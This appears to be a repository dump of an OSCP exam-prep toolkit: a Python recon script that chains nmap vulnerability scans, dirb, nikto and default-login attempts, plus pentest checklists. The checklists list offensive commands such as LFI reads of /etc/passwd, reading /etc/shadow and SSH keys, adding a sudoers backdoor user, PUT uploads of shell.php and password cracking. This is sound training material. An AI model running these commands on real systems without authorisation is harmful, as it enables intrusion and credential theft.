Repository: xapax/oscp Branch: master Commit: 7ea469640337 Files: 6 Total size: 43.4 KB Directory structure: gitextract_kkjeoamh/ ├── README.md ├── recon_enum/ │ └── reconscan.py ├── reports/ │ └── reports.txt ├── setup.sh └── templates/ ├── linux-template.md └── windows-template.md ================================================ FILE CONTENTS ================================================ ================================================ FILE: README.md ================================================ # oscp ## Reconscan.py This script is based on the script by [Mike Czumak](http://www.securitysift.com/offsec-pwb-oscp/). But it is heavily rewritten, some things have been added, other stuff has been removed. The script is written as a preparation for the OSCP exam. It was never meant to be a general script. So if you want to use it you have to make sure to fix all the hardcoded paths. The script is multithreaded and can be run against several hosts at once. The script is invoked like this: ``` python reconscan.py 192.168.1.101 192.168.1.102 192.168.1.103 ``` One important thing to note is that I removed the scan for all ports. Because it would sometimes just take to long to run. So make sure you either add that scan or run it afterwards. So you don't miss any ports. Please note that the script includes dirb and nikto-scans that are very invasive. The script also includes several nmap-scripts that check for vulnerabilities. So yeah, this script would be pretty illegal and bad to run against a machine you don't have permission to attack. ## Templates I created two templates that I used as a guide for every machine I attacked. One template is for Linux machines and the other for windows. There are some differences between them. The templates became kind of my checklists. They are divided into three sections: **recon**, **privilege escalation** and **loot**. The templates are written in markdown. But I never actually rendered them, so I don't really know how they look like rendered. They are probably pretty messy. I also used them together with markdown syntax-highlightning in my editor, so it became easy to navigate the files. The templates have a few keywords in the, like **INSERTIPADDRESS**. These are hooks that are read by reconscan.py, and it insert the target machine IP-address automatically. Some other stuff are also inserted automatically, like the a basic nmap-scan. And nikto-scan. Wherever there are references to a book. This is the book: https://bobloblaw.gitbooks.io/security/content/ ================================================ FILE: recon_enum/reconscan.py ================================================ #!/usr/bin/env python import subprocess import multiprocessing from multiprocessing import Process, Queue import os import time import fileinput import atexit import sys import socket import re # Todo: # Add mysql nmap-script # Change replace to sed: # sed 's|literal_pattern|replacement_string|g' start = time.time() class bcolors: HEADER = '\033[95m' OKBLUE = '\033[94m' OKGREEN = '\033[92m' WARNING = '\033[93m' FAIL = '\033[91m' ENDC = '\033[0m' BOLD = '\033[1m' UNDERLINE = '\033[4m' # Creates a function for multiprocessing. Several things at once. def multProc(targetin, scanip, port): jobs = [] p = multiprocessing.Process(target=targetin, args=(scanip,port)) jobs.append(p) p.start() return def connect_to_port(ip_address, port, service): s = socket.socket(socket.AF_INET, socket.SOCK_STREAM) s.connect((ip_address, int(port))) banner = s.recv(1024) if service == "ftp": s.send("USER anonymous\r\n") user = s.recv(1024) s.send("PASS anonymous\r\n") password = s.recv(1024) total_communication = banner + "\r\n" + user + "\r\n" + password write_to_file(ip_address, "ftp-connect", total_communication) elif service == "smtp": total_communication = banner + "\r\n" write_to_file(ip_address, "smtp-connect", total_communication) elif service == "ssh": total_communication = banner write_to_file(ip_address, "ssh-connect", total_communication) elif service == "pop3": s.send("USER root\r\n") user = s.recv(1024) s.send("PASS root\r\n") password = s.recv(1024) total_communication = banner + user + password write_to_file(ip_address, "pop3-connect", total_communication) s.close() def write_to_file(ip_address, enum_type, data): file_path_linux = '../reports/%s/mapping-linux.md' % (ip_address) file_path_windows = '../reports/%s/mapping-windows.md' % (ip_address) paths = [file_path_linux, file_path_windows] print bcolors.OKGREEN + "INFO: Writing " + enum_type + " to template files:\n " + file_path_linux + " \n" + file_path_windows + bcolors.ENDC for path in paths: if enum_type == "portscan": subprocess.check_output("replace INSERTTCPSCAN \"" + data + "\" -- " + path, shell=True) if enum_type == "dirb": subprocess.check_output("replace INSERTDIRBSCAN \"" + data + "\" -- " + path, shell=True) if enum_type == "nikto": subprocess.check_output("replace INSERTNIKTOSCAN \"" + data + "\" -- " + path, shell=True) if enum_type == "ftp-connect": subprocess.check_output("replace INSERTFTPTEST \"" + data + "\" -- " + path, shell=True) if enum_type == "smtp-connect": subprocess.check_output("replace INSERTSMTPCONNECT \"" + data + "\" -- " + path, shell=True) if enum_type == "ssh-connect": subprocess.check_output("replace INSERTSSHCONNECT \"" + data + "\" -- " + path, shell=True) if enum_type == "pop3-connect": subprocess.check_output("replace INSERTPOP3CONNECT \"" + data + "\" -- " + path, shell=True) if enum_type == "curl": subprocess.check_output("replace INSERTCURLHEADER \"" + data + "\" -- " + path, shell=True) return def dirb(ip_address, port, url_start, wordlist="/usr/share/wordlist/dirb/big.txt, /usr/share/wordlist/dirb/vulns/cgis.txt"): print bcolors.HEADER + "INFO: Starting dirb scan for " + ip_address + bcolors.ENDC DIRBSCAN = "dirb %s://%s:%s %s -o ../reports/%s/dirb-%s.txt -r" % (url_start, ip_address, port, ip_address, ip_address, wordlist) print bcolors.HEADER + DIRBSCAN + bcolors.ENDC results_dirb = subprocess.check_output(DIRBSCAN, shell=True) print bcolors.OKGREEN + "INFO: RESULT BELOW - Finished with dirb scan for " + ip_address + bcolors.ENDC print results_dirb write_to_file(ip_address, "dirb", results_dirb) return def nikto(ip_address, port, url_start): print bcolors.HEADER + "INFO: Starting nikto scan for " + ip_address + bcolors.ENDC NIKTOSCAN = "nikto -h %s://%s -o ../reports/%s/nikto-%s-%s.txt" % (url_start, ip_address, ip_address, url_start, ip_address) print bcolors.HEADER + NIKTOSCAN + bcolors.ENDC results_nikto = subprocess.check_output(NIKTOSCAN, shell=True) print bcolors.OKGREEN + "INFO: RESULT BELOW - Finished with NIKTO-scan for " + ip_address + bcolors.ENDC print results_nikto write_to_file(ip_address, "nikto", results_nikto) return def httpEnum(ip_address, port): print bcolors.HEADER + "INFO: Detected http on " + ip_address + ":" + port + bcolors.ENDC print bcolors.HEADER + "INFO: Performing nmap web script scan for " + ip_address + ":" + port + bcolors.ENDC dirb_process = multiprocessing.Process(target=dirb, args=(ip_address,port,"http")) dirb_process.start() nikto_process = multiprocessing.Process(target=nikto, args=(ip_address,port,"http")) nikto_process.start() CURLSCAN = "curl -I http://%s" % (ip_address) print bcolors.HEADER + CURLSCAN + bcolors.END curl_results = subprocess.check_output(CURLSCAN, shell=True) write_to_file(ip_address, "curl", curl_results) HTTPSCAN = "nmap -sV -Pn -p %s --script=http-vhosts,http-userdir-enum,http-apache-negotiation,http-backup-finder,http-config-backup,http-default-accounts,http-methods,http-method-tamper,http-passwd,http-robots.txt,http-devframework,http-enum,http-frontpage-login,http-git,http-iis-webdav-vuln,http-php-version,http-robots.txt,http-shellshock,http-vuln-cve2015-1635 -oN ../reports/%s/%s_http.nmap %s" % (port, ip_address, ip_address, ip_address) print bcolors.HEADER + HTTPSCAN + bcolors.ENDC http_results = subprocess.check_output(HTTPSCAN, shell=True) print bcolors.OKGREEN + "INFO: RESULT BELOW - Finished with HTTP-SCAN for " + ip_address + bcolors.ENDC print http_results return def httpsEnum(ip_address, port): print bcolors.HEADER + "INFO: Detected https on " + ip_address + ":" + port + bcolors.ENDC print bcolors.HEADER + "INFO: Performing nmap web script scan for " + ip_address + ":" + port + bcolors.ENDC dirb_process = multiprocessing.Process(target=dirb, args=(ip_address,port,"https")) dirb_process.start() nikto_process = multiprocessing.Process(target=nikto, args=(ip_address,port,"https")) nikto_process.start() SSLSCAN = "sslscan %s:%s >> ../reports/%s/ssl_scan_%s" % (ip_address, port, ip_address, ip_address) print bcolors.HEADER + SSLSCAN + bcolors.ENDC ssl_results = subprocess.check_output(SSLSCAN, shell=True) print bcolors.OKGREEN + "INFO: CHECK FILE - Finished with SSLSCAN for " + ip_address + bcolors.ENDC HTTPSCANS = "nmap -sV -Pn -p %s --script=http-vhosts,http-userdir-enum,http-apache-negotiation,http-backup-finder,http-config-backup,http-default-accounts,http-methods,http-method-tamper,http-passwd,http-robots.txt,http-devframework,http-enum,http-frontpage-login,http-git,http-iis-webdav-vuln,http-php-version,http-robots.txt,http-shellshock,http-vuln-cve2015-1635 -oN ../reports/%s/%s_http.nmap %s" % (port, ip_address, ip_address, ip_address) print bcolors.HEADER + HTTPSCANS + bcolors.ENDC https_results = subprocess.check_output(HTTPSCANS, shell=True) print bcolors.OKGREEN + "INFO: RESULT BELOW - Finished with HTTPS-scan for " + ip_address + bcolors.ENDC print https_results return def mssqlEnum(ip_address, port): print bcolors.HEADER + "INFO: Detected MS-SQL on " + ip_address + ":" + port + bcolors.ENDC print bcolors.HEADER + "INFO: Performing nmap mssql script scan for " + ip_address + ":" + port + bcolors.ENDC MSSQLSCAN = "nmap -sV -Pn -p %s --script=ms-sql-info,ms-sql-config,ms-sql-dump-hashes,mysql-empty-password,mysql-brute,mysql-users,mysql-variables,mysql-vuln-cve2012-2122 --script-args=mssql.instance-port=1433,mssql.username=sa,mssql.password=sa -oN ../reports/%s/mssql_%s.nmap %s" % (port, ip_address, ip_address) print bcolors.HEADER + MSSQLSCAN + bcolors.ENDC mssql_results = subprocess.check_output(MSSQLSCAN, shell=True) print bcolors.OKGREEN + "INFO: RESULT BELOW - Finished with MSSQL-scan for " + ip_address + bcolors.ENDC print mssql_results return def smtpEnum(ip_address, port): print bcolors.HEADER + "INFO: Detected smtp on " + ip_address + ":" + port + bcolors.ENDC connect_to_port(ip_address, port, "smtp") SMTPSCAN = "nmap -sV -Pn -p %s --script=smtp-commands,smtp-enum-users,smtp-vuln-cve2010-4344,smtp-vuln-cve2011-1720,smtp-vuln-cve2011-1764 %s -oN ../reports/%s/smtp_%s.nmap" % (port, ip_address, ip_address, ip_address) print bcolors.HEADER + SMTPSCAN + bcolors.ENDC smtp_results = subprocess.check_output(SMTPSCAN, shell=True) print bcolors.OKGREEN + "INFO: RESULT BELOW - Finished with SMTP-scan for " + ip_address + bcolors.ENDC print smtp_results # write_to_file(ip_address, "smtp", smtp_results) return def smbNmap(ip_address, port): print "INFO: Detected SMB on " + ip_address + ":" + port smbNmap = "nmap --script=smb-enum-shares,smb-ls,smb-enum-users,smb-mbenum,smb-os-discovery,smb-security-mode,smb-vuln-cve2009-3103,smb-vuln-ms06-025,smb-vuln-ms07-029,smb-vuln-ms08-067,smb-vuln-ms10-054,smb-vuln-ms10-061,smb-vuln-regsvc-dos %s -oN ../reports/%s/smb_%s.nmap" % (ip_address, ip_address, ip_address) smbNmap_results = subprocess.check_output(smbNmap, shell=True) print bcolors.OKGREEN + "INFO: RESULT BELOW - Finished with SMB-Nmap-scan for " + ip_address + bcolors.ENDC print smbNmap_results return def smbEnum(ip_address, port): print "INFO: Detected SMB on " + ip_address + ":" + port enum4linux = "enum4linux -a %s > ../reports/%s/enum4linux_%s 2>/dev/null" % (ip_address, ip_address, ip_address) enum4linux_results = subprocess.check_output(enum4linux, shell=True) print bcolors.OKGREEN + "INFO: CHECK FILE - Finished with ENUM4LINUX-Nmap-scan for " + ip_address + bcolors.ENDC print enum4linux_results return def ftpEnum(ip_address, port): print bcolors.HEADER + "INFO: Detected ftp on " + ip_address + ":" + port + bcolors.ENDC connect_to_port(ip_address, port, "ftp") FTPSCAN = "nmap -sV -Pn -p %s --script=ftp-anon,ftp-bounce,ftp-libopie,ftp-proftpd-backdoor,ftp-vsftpd-backdoor,ftp-vuln-cve2010-4221 -oN '../reports/%s/ftp_%s.nmap' %s" % (port, ip_address, ip_address, ip_address) print bcolors.HEADER + FTPSCAN + bcolors.ENDC results_ftp = subprocess.check_output(FTPSCAN, shell=True) print bcolors.OKGREEN + "INFO: RESULT BELOW - Finished with FTP-Nmap-scan for " + ip_address + bcolors.ENDC print results_ftp return def udpScan(ip_address): print bcolors.HEADER + "INFO: Detected UDP on " + ip_address + bcolors.ENDC UDPSCAN = "nmap -Pn -A -sC -sU -T 3 --top-ports 200 -oN '../reports/%s/udp_%s.nmap' %s" % (ip_address, ip_address, ip_address) print bcolors.HEADER + UDPSCAN + bcolors.ENDC udpscan_results = subprocess.check_output(UDPSCAN, shell=True) print bcolors.OKGREEN + "INFO: RESULT BELOW - Finished with UDP-Nmap scan for " + ip_address + bcolors.ENDC print udpscan_results UNICORNSCAN = "unicornscan -mU -I %s > ../reports/%s/unicorn_udp_%s.txt" % (ip_address, ip_address, ip_address) unicornscan_results = subprocess.check_output(UNICORNSCAN, shell=True) print bcolors.OKGREEN + "INFO: CHECK FILE - Finished with UNICORNSCAN for " + ip_address + bcolors.ENDC def sshScan(ip_address, port): print bcolors.HEADER + "INFO: Detected SSH on " + ip_address + ":" + port + bcolors.ENDC connect_to_port(ip_address, port, "ssh") SSHSCAN = "nmap -sV -Pn -p %s --script=ssh-auth-methods,ssh-hostkey,ssh-run,sshv1 -oN '../reports/%s/ssh_%s.nmap' %s" % (port, ip_address, ip_address, ip_address) print bcolors.HEADER + SSHSCAN + bcolors.ENDC results_ssh = subprocess.check_output(SSHSCAN, shell=True) print bcolors.OKGREEN + "INFO: RESULT BELOW - Finished with SSH-Nmap-scan for " + ip_address + bcolors.ENDC print results_ssh return def pop3Scan(ip_address, port): print bcolors.HEADER + "INFO: Detected POP3 on " + ip_address + ":" + port + bcolors.ENDC connect_to_port(ip_address, port, "pop3") POP3SCAN = "nmap -sV -Pn -p %s --script=pop3-brute,pop3-capabilities,pop3-ntlm-info -oN '../reports/%s/pop3_%s.nmap' %s" % (port, ip_address, ip_address, ip_address) print bcolors.HEADER + SSHSCAN + bcolors.ENDC results_pop3 = subprocess.check_output(POP3SCAN, shell=True) print bcolors.OKGREEN + "INFO: RESULT BELOW - Finished with POP3-Nmap-scan for " + ip_address + bcolors.ENDC print results_pop3 return def nmapScan(ip_address): ip_address = ip_address.strip() print bcolors.OKGREEN + "INFO: Running general TCP/UDP nmap scans for " + ip_address + bcolors.ENDC TCPSCAN = "nmap -sV -O %s -oN '../reports/%s/%s.nmap'" % (ip_address, ip_address, ip_address) print bcolors.HEADER + TCPSCAN + bcolors.ENDC results = subprocess.check_output(TCPSCAN, shell=True) print bcolors.OKGREEN + "INFO: RESULT BELOW - Finished with BASIC Nmap-scan for " + ip_address + bcolors.ENDC print results p = multiprocessing.Process(target=udpScan, args=(scanip,)) p.start() write_to_file(ip_address, "portscan", results) lines = results.split("\n") serv_dict = {} for line in lines: ports = [] line = line.strip() if ("tcp" in line) and ("open" in line) and not ("Discovered" in line): # print line while " " in line: line = line.replace(" ", " "); linesplit= line.split(" ") service = linesplit[2] # grab the service name port = line.split(" ")[0] # grab the port/proto # print port if service in serv_dict: ports = serv_dict[service] # if the service is already in the dict, grab the port list ports.append(port) # print ports serv_dict[service] = ports # add service to the dictionary along with the associated port(2) # go through the service dictionary to call additional targeted enumeration functions for serv in serv_dict: ports = serv_dict[serv] if re.search(r"http[^s]", serv): for port in ports: port = port.split("/")[0] multProc(httpEnum, ip_address, port) elif re.search(r"https|ssl", serv): for port in ports: port = port.split("/")[0] multProc(httpsEnum, ip_address, port) elif "smtp" in serv: for port in ports: port = port.split("/")[0] multProc(smtpEnum, ip_address, port) elif "ftp" in serv: for port in ports: port = port.split("/")[0] multProc(ftpEnum, ip_address, port) elif ("microsoft-ds" in serv) or ("netbios-ssn" == serv): for port in ports: port = port.split("/")[0] multProc(smbEnum, ip_address, port) multProc(smbNmap, ip_address, port) elif "ms-sql" in serv: for port in ports: port = port.split("/")[0] multProc(mssqlEnum, ip_address, port) elif "ssh" in serv: for port in ports: port = port.split("/")[0] multProc(sshScan, ip_address, port) elif "snmp" in serv: for port in ports: port = port.split("/")[0] multProc(snmpEnum, ip_address, port) return print bcolors.HEADER print "------------------------------------------------------------" print "!!!! RECON SCAN !!!!!" print "!!!! A multi-process service scanner !!!!!" print "!!!! dirb, nikto, ftp, ssh, mssql, pop3, tcp !!!!!" print "!!!! udp, smtp, smb !!!!!" print "------------------------------------------------------------" if len(sys.argv) < 2: print "" print "Usage: python reconscan.py " print "Example: python reconscan.py 192.168.1.101 192.168.1.102" print "" print "############################################################" pass sys.exit() print bcolors.ENDC if __name__=='__main__': # Setting ip targets targets = sys.argv targets.pop(0) dirs = os.listdir("../reports/") for scanip in targets: scanip = scanip.rstrip() if not scanip in dirs: print bcolors.HEADER + "INFO: No folder was found for " + scanip + ". Setting up folder." + bcolors.ENDC subprocess.check_output("mkdir ../reports/" + scanip, shell=True) subprocess.check_output("mkdir ../reports/" + scanip + "/exploits", shell=True) subprocess.check_output("mkdir ../reports/" + scanip + "/privesc", shell=True) print bcolors.OKGREEN + "INFO: Folder created here: " + "../reports/" + scanip + bcolors.ENDC subprocess.check_output("cp ../templates/windows-template.md ../reports/" + scanip + "/mapping-windows.md", shell=True) subprocess.check_output("cp ../templates/linux-template.md ../reports/" + scanip + "/mapping-linux.md", shell=True) print bcolors.OKGREEN + "INFO: Added pentesting templates: " + "../reports/" + scanip + bcolors.ENDC subprocess.check_output("sed -i -e 's/INSERTIPADDRESS/" + scanip + "/g' ../reports/" + scanip + "/mapping-windows.md", shell=True) subprocess.check_output("sed -i -e 's/INSERTIPADDRESS/" + scanip + "/g' ../reports/" + scanip + "/mapping-linux.md", shell=True) p = multiprocessing.Process(target=nmapScan, args=(scanip,)) p.start() ================================================ FILE: reports/reports.txt ================================================ ================================================ FILE: setup.sh ================================================ #!/bin/bash folder=$(find /home /usr /var /tmp /opt /mnt /root -type d -name recon_enum -print -quit 2>/dev/null) echo -e '#!/bin/bash\n' > /usr/bin/reconscan echo -e "cd $folder && python reconscan.py \"\$@\" \n" >> /usr/bin/reconscan chmod +x /usr/bin/reconscan ================================================ FILE: templates/linux-template.md ================================================ ## Info-sheet - DNS-Domain name: - Host name: - OS: - Server: - Kernel: - Workgroup: - Windows domain: Services and ports: INSERTTCPSCAN ## Recon ``` Always start with a stealthy scan to avoid closing ports. # Syn-scan nmap -sS INSERTIPADDRESS # Scan all ports, might take a while. nmap INSERTIPADDRESS -p- # Service-version, default scripts, OS: nmap INSERTIPADDRESS -sV -sC -O -p 111,222,333 # Scan for UDP nmap INSERTIPADDRESS -sU unicornscan -mU -v -I INSERTIPADDRESS # Connect to udp if one is open nc -u INSERTIPADDRESS 48772 # Monster scan nmap INSERTIPADDRESS -p- -A -T4 -sC ``` ### Port 21 - FTP - FTP-Name: - FTP-version: - Anonymous login: INSERTFTPTEST ``` nmap --script=ftp-anon,ftp-libopie,ftp-proftpd-backdoor,ftp-vsftpd-backdoor,ftp-vuln-cve2010-4221,tftp-enum -p 21 INSERTIPADDRESS ``` ### Port 22 - SSH - Name: - Version: - Takes-password: - If you have usernames test login with username:username INSERTSSHCONNECT ``` nc INSERTIPADDRESS 22 ``` ### Port 25 - Name: - Version: - VRFY: INSERTSMTPCONNECT ``` nc -nvv INSERTIPADDRESS 25 HELO foo telnet INSERTIPADDRESS 25 VRFY root nmap --script=smtp-commands,smtp-enum-users,smtp-vuln-cve2010-4344,smtp-vuln-cve2011-1720,smtp-vuln-cve2011-1764 -p 25 INSERTIPADDRESS ``` ### Port 69 - UDP - TFTP This is used for tftp-server. ### Port 110 - Pop3 - Name: - Version: INSERTPOP3CONNECT ``` telnet INSERTIPADDRESS 110 USER pelle@INSERTIPADDRESS PASS admin or: USER pelle PASS admin # List all emails list # Retrieve email number 5, for example retr 9 ``` ### Port 111 - Rpcbind ``` rpcinfo -p INSERTIPADDRESS ``` ### Port 135 - MSRPC Some versions are vulnerable. ### Port 143 - Imap ### Port 139/445 - SMB - Name: - Version: - Domain/workgroup name: - Domain-sid: - Allows unauthenticated login: ``` nmap --script=smb-enum-shares.nse,smb-ls.nse,smb-enum-users.nse,smb-mbenum.nse,smb-os-discovery.nse,smb-security-mode.nse,smbv2-enabled.nse,smb-vuln-cve2009-3103.nse,smb-vuln-ms06-025.nse,smb-vuln-ms07-029.nse,smb-vuln-ms08-067.nse,smb-vuln-ms10-054.nse,smb-vuln-ms10-061.nse,smb-vuln-regsvc-dos.nse,smbv2-enabled.nse INSERTIPADDRESS -p 445 enum4linux -a INSERTIPADDRESS rpcclient -U "" INSERTIPADDRESS srvinfo enumdomusers getdompwinfo querydominfo netshareenum netshareenumall smbclient -L INSERTIPADDRESS smbclient //INSERTIPADDRESS/tmp smbclient \\\\INSERTIPADDRESS\\ipc$ -U john smbclient //INSERTIPADDRESS/ipc$ -U john ``` ### Port 161/162 UDP - SNMP ``` nmap -vv -sV -sU -Pn -p 161,162 --script=snmp-netstat,snmp-processes INSERTIPADDRESS snmp-check -t INSERTIPADDRESS -c public ``` ``` # Common community strings public private community ``` ### Port 554 - RTSP ### Port 1030/1032/1033/1038 Used by RPC to connect in domain network. ## Port 1521 - Oracle - Name: - Version: - Password protected: ``` tnscmd10g version -h INSERTIPADDRESS tnscmd10g status -h INSERTIPADDRESS ``` ### Port 2049 - NFS ``` showmount -e INSERTIPADDRESS If you find anything you can mount it like this: mount INSERTIPADDRESS:/ /tmp/NFS mount -t INSERTIPADDRESS:/ /tmp/NFS ``` ### Port 2100 - Oracle XML DB - Name: - Version: - Default logins: ``` sys:sys scott:tiger ``` Default passwords https://docs.oracle.com/cd/B10501_01/win.920/a95490/username.htm ### 3306 - MySQL - Name: - Version: ``` nmap --script=mysql-databases.nse,mysql-empty-password.nse,mysql-enum.nse,mysql-info.nse,mysql-variables.nse,mysql-vuln-cve2012-2122.nse INSERTIPADDRESS -p 3306 mysql --host=INSERTIPADDRESS -u root -p ``` ### Port 3339 - Oracle web interface - Basic info about web service (apache, nginx, IIS) - Server: - Scripting language: - Apache Modules: - IP-address: ### Port 80 - Web server - Server: - Scripting language: - Apache Modules: - IP-address: - Domain-name address: INSERTCURLHEADER - Web application (ex, wordpress, joomla, phpmyadmin) - Name: - Version: - Admin-login: ``` # Nikto nikto -h http://INSERTIPADDRESS # Nikto with squid proxy nikto -h INSERTIPADDRESS -useproxy http://INSERTIPADDRESS:4444 # CMS Explorer cms-explorer -url http://INSERTIPADDRESS -type [Drupal, WordPress, Joomla, Mambo] # WPScan (vp = Vulnerable Plugins, vt = Vulnerable Themes, u = Users) wpscan --url http://INSERTIPADDRESS wpscan --url http://INSERTIPADDRESS --enumerate vp wpscan --url http://INSERTIPADDRESS --enumerate vt wpscan --url http://INSERTIPADDRESS --enumerate u # Joomscan joomscan -u http://INSERTIPADDRESS joomscan -u http://INSERTIPADDRESS --enumerate-components # Get header curl -i INSERTIPADDRESS # Get everything curl -i -L INSERTIPADDRESS # Check for title and all links curl INSERTIPADDRESS -s -L | grep "title\|href" | sed -e 's/^[[:space:]]*//' # Look at page with just text curl INSERTIPADDRESS -s -L | html2text -width '99' | uniq # Check if it is possible to upload curl -v -X OPTIONS http://INSERTIPADDRESS/ curl -v -X PUT -d '' http://INSERTIPADDRESS/test/shell.php dotdotpwn.pl -m http -h INSERTIPADDRESS -M GET -o unix ``` #### Nikto scan INSERTNIKTOSCAN #### Url brute force ``` # Not recursive dirb http://INSERTIPADDRESS -r -o dirb-INSERTIPADDRESS.txt # Gobuster - remove relevant responde codes (403 for example) gobuster -u http://INSERTIPADDRESS -w /usr/share/seclists/Discovery/Web_Content/common.txt -s '200,204,301,302,307,403,500' -e ``` INSERTDIRBSCAN #### Default/Weak login Search documentation for default passwords and test them ``` site:webapplication.com password ``` ``` admin admin admin password admin admin root root root admin root password root password admin username username ``` #### LFI/RFI ``` fimap -u "http://INSERTIPADDRESS/example.php?test=" # Ordered output curl -s http://INSERTIPADDRESS/gallery.php?page=/etc/passwd /root/Tools/Kadimus/kadimus -u http://INSERTIPADDRESS/example.php?page= ``` #### SQL-Injection ``` # Post ./sqlmap.py -r search-test.txt -p tfUPass # Get sqlmap -u "http://INSERTIPADDRESS/index.php?id=1" --dbms=mysql # Crawl sqlmap -u http://INSERTIPADDRESS --dbms=mysql --crawl=3 ``` #### Sql-login-bypass - Open Burp-suite - Make and intercept a request - Send to intruder - Cluster attack. - Paste in sqlibypass-list (https://bobloblaw.gitbooks.io/security/content/sql-injections.html) - Attack - Check for response length variation ### Password brute force - last resort ``` cewl ``` ### Port 443 - HTTPS Heartbleed: ``` # Heartbleed sslscan INSERTIPADDRESS:443 ``` ## Vulnerability analysis Now we have gathered information about the system. Now comes the part where we look for exploits and vulnerabilites and features. ### To try - List of possibilies Add possible exploits here: ### Find sploits - Searchsploit and google Where there are many exploits for a software, use google. It will automatically sort it by popularity. ``` site:exploit-db.com apache 2.4.7 # Remove dos-exploits searchsploit Apache 2.4.7 | grep -v '/dos/' searchsploit Apache | grep -v '/dos/' | grep -vi "tomcat" # Only search the title (exclude the path), add the -t searchsploit -t Apache | grep -v '/dos/' ``` ---------------------------------------------------------------------------- '''''''''''''''''''''''''''''''''' PRIVESC ''''''''''''''''''''''''''''''''' ----------------------------------------------------------------------------- ## Privilege escalation Now we start the whole enumeration-process over gain. - Kernel exploits - Programs running as root - Installed software - Weak/reused/plaintext passwords - Inside service - Suid misconfiguration - World writable scripts invoked by root - Unmounted filesystems Less likely - Private ssh keys - Bad path configuration - Cronjobs ### To-try list Here you will add all possible leads. What to try. ### Useful commands ``` # Spawning shell python -c 'import pty; pty.spawn("/bin/sh")' # Access to more binaries export PATH=/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin # Set up webserver cd /root/oscp/useful-tools/privesc/linux/privesc-scripts; python -m SimpleHTTPServer 8080 # Download all files wget http://192.168.1.101:8080/ -r; mv 192.168.1.101:8080 exploits; cd exploits; rm index.html; chmod 700 LinEnum.sh linprivchecker.py unix-privesc-check ./LinEnum.sh -t -k password -r LinEnum.txt python linprivchecker.py extended ./unix-privesc-check standard # Writable directories /tmp /var/tmp # Add user to sudoers echo "hacker ALL=(ALL:ALL) ALL" >> /etc/sudoers ``` ### Basic info - OS: - Version: - Kernel version: - Architecture: - Current user: **Devtools:** - GCC: - NC: - WGET: **Users with login:** ``` uname -a env id cat /proc/version cat /etc/issue cat /etc/passwd cat /etc/group cat /etc/shadow cat /etc/hosts # Users with login grep -vE "nologin" /etc/passwd # Priv Enumeration Scripts upload /unix-privesc-check upload /root/Desktop/Backup/Tools/Linux_privesc_tools/linuxprivchecker.py ./ upload /root/Desktop/Backup/Tools/Linux_privesc_tools/LinEnum.sh ./ python linprivchecker.py extended ./LinEnum.sh -t -k password unix-privesc-check ``` ### Kernel exploits ``` site:exploit-db.com kernel version perl /root/oscp/useful-tools/privesc/linux/Linux_Exploit_Suggester/Linux_Exploit_Suggester.pl -k 2.6 python linprivchecker.py extended ``` ### Programs running as root Look for webserver, mysql or anything else like that. ``` # Metasploit ps # Linux ps aux ``` ### Installed software ``` /usr/local/ /usr/local/src /usr/local/bin /opt/ /home /var/ /usr/src/ # Debian dpkg -l # CentOS, OpenSuse, Fedora, RHEL rpm -qa (CentOS / openSUSE ) # OpenBSD, FreeBSD pkg_info ``` ### Weak/reused/plaintext passwords - Check database config-file - Check databases - Check weak passwords ``` username:username username:username1 username:root username:admin username:qwerty username:password ``` - Check plaintext ``` ./LinEnum.sh -t -k password ``` ### Inside service ``` # Linux netstat -anlp netstat -ano ``` ### Suid misconfiguration Binary with suid permission can be run by anyone, but when they are run they are run as root! Example programs: ``` nmap vim nano ``` ``` find / -perm -u=s -type f 2>/dev/null ``` ### Unmounted filesystems Here we are looking for any unmounted filesystems. If we find one we mount it and start the priv-esc process over again. ``` mount -l ``` ### Cronjob Look for anything that is owned by privileged user but writable for you ``` crontab -l ls -alh /var/spool/cron ls -al /etc/ | grep cron ls -al /etc/cron* cat /etc/cron* cat /etc/at.allow cat /etc/at.deny cat /etc/cron.allow cat /etc/cron.deny cat /etc/crontab cat /etc/anacrontab cat /var/spool/cron/crontabs/root ``` ### SSH Keys Check all home directories ``` cat ~/.ssh/authorized_keys cat ~/.ssh/identity.pub cat ~/.ssh/identity cat ~/.ssh/id_rsa.pub cat ~/.ssh/id_rsa cat ~/.ssh/id_dsa.pub cat ~/.ssh/id_dsa cat /etc/ssh/ssh_config cat /etc/ssh/sshd_config cat /etc/ssh/ssh_host_dsa_key.pub cat /etc/ssh/ssh_host_dsa_key cat /etc/ssh/ssh_host_rsa_key.pub cat /etc/ssh/ssh_host_rsa_key cat /etc/ssh/ssh_host_key.pub cat /etc/ssh/ssh_host_key ``` ### Bad path configuration Require user interaction ------------------------------------------------------------------------ ----------------------------- LOOT LOOT LOOT LOOT ---------------------- ------------------------------------------------------------------------ ## Loot **Checklist** - Proof: - Network secret: - Passwords and hashes: - Dualhomed: - Tcpdump: - Interesting files: - Databases: - SSH-keys: - Browser: - Mail: ### Proof ``` /root/proof.txt ``` ### Network secret ``` /root/network-secret.txt ``` ### Passwords and hashes ``` cat /etc/passwd cat /etc/shadow unshadow passwd shadow > unshadowed.txt john --rules --wordlist=/usr/share/wordlists/rockyou.txt unshadowed.txt ``` ### Dualhomed ``` ifconfig ifconfig -a arp -a ``` ### Tcpdump ``` tcpdump -i any -s0 -w capture.pcap tcpdump -i eth0 -w capture -n -U -s 0 src not 192.168.1.X and dst not 192.168.1.X tcpdump -vv -i eth0 src not 192.168.1.X and dst not 192.168.1.X ``` ### Interesting files ``` #Meterpreter search -f *.txt search -f *.zip search -f *.doc search -f *.xls search -f config* search -f *.rar search -f *.docx search -f *.sql .ssh: .bash_history ``` ### Databases ### SSH-Keys ### Browser ### Mail ``` /var/mail /var/spool/mail ``` ### GUI If there is a gui we want to check out the browser. ``` echo $DESKTOP_SESSION echo $XDG_CURRENT_DESKTOP echo $GDMSESSION ``` ## How to replicate: ================================================ FILE: templates/windows-template.md ================================================ ## Info-sheet - DNS-Domain name: - Host name: - OS: - Server: - Workgroup: - Windows domain: - Services and ports: INSERTTCPSCAN ## Recon ``` Always start with a stealthy scan to avoid closing ports. # Syn-scan nmap -sS INSERTIPADDRESS # Service-version, default scripts, OS: nmap INSERTIPADDRESS -sV -sC -O # Scan all ports, might take a while. nmap INSERTIPADDRESS -p- # Scan for UDP nmap INSERTIPADDRESS -sU unicornscan -mU -v -I INSERTIPADDRESS # Connect to udp if one is open nc -u INSERTIPADDRESS 48772 # Monster scan nmap INSERTIPADDRESS -p- -A -T4 -sC ``` ### Port 21 - FTP - Name: - Version: - Anonymous login: INSERTFTPTEST ``` nmap 